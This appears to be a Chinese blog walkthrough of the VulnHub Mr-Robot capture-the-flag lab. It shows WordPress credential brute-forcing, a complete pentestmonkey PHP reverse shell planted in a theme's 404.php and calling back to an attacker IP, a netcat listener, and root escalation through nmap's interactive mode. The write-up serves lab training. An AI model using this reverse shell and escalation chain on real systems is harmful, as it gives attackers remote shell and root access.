下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/
描述:
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
有三个key
1、找到靶机ip---192.168.0.109
netdiscover -r 192.168.0.0/24
2、扫描主机开放端口,看到开放端口有22,80,443
nmap -A -p- 192.168.0.109
3、访问80端口,443端口,两个内容是一样的,页面就两个字----酷炫
4、随便试试几个常见的目录robots.txt,readme.txt
在robots.txt下面发现了东西
得到第一个key和一个字典文件
访问readme.txt是不存在这个页面的,暴露出了WordPress站点
5、既然是wp站点,直接上工具扫描,这里使用kali自带的wpscan,工具有问题的去看我的前一篇文章
结果显示没有找到用户名
6、进入到默认的后台wp-admin并getshell
尝试一些弱口令都不行,但是却发现了 一些问题,用户名错误时就显示invalid username
于是想到用刚刚的字典来爆破用户名
下载文件并且排序去重
wget http://192.168.0.109/fsocity.dic
cat fsocity.dic|sort|uniq > dict.txt使用burpsuit抓包先爆破用户名,得到三个,看样子是不区分大小写的elliot
再爆破密码,得到ER28-0652
7、进入后台并getshell
有了用户名和密码elliot/ER28-0652,就直接登录后台,修改404页面,本地监听,访问页面,getshell
登录后台wp-admin
修改404.php内容为php-reverse-shell.php文件的内容,修改ip,port
https://192.168.0.109/wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen&scrollto=1266
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.0.107'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
kali上开启监听本地4444端口
nc -lvvp 4444
访问404.php页面
https://192.168.0.109/wp-content/themes/twentyfifteen/404.phpkali成功接收到shell
8、提权
通过python获取一个tty
python -c 'import pty;pty.spawn("/bin/sh")'在/home/robot目录下发现了第二个key和一个password文件
读取key没有权限,password文件成功读取
把密文拿去md5在线网站解密,得到
使用用户名登录到robot并查看第二个key文件,由于前面扫描22端口是closed状态,所以ssh远程登录不行
接下来还有第三个key文件,根据套路,肯定在root目录下,需要提权,下载LinEnum.sh到/tmp目录下执行
发现了一个nmap命令,于是使用nmap提权,此时就是root身份了,查看第三个key文件
nmap --interactive 进入交互界面
!sh
9、补充----扫目录(另一种获取后台用户名密码的方式)
扫目录的结果
找一些特殊的目录进行访问一下
访问0目录的时候就暴露出了wp站点
访问readme.html,没有什么有价值的信息
访问license.txt,没有什么有价值的东西
等等,发现右边怎么有个滚动条,此事必然不简单
接着往下面滑
接着往下滑,得到一串base64编码的密文:ZWxsaW90OkVSMjgtMDY1Mgo=
拿到在线解密网站解密,得到用户名和密码elliot:ER28-0652,直接帮我们省去了爆破的时间
扫一扫
900
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
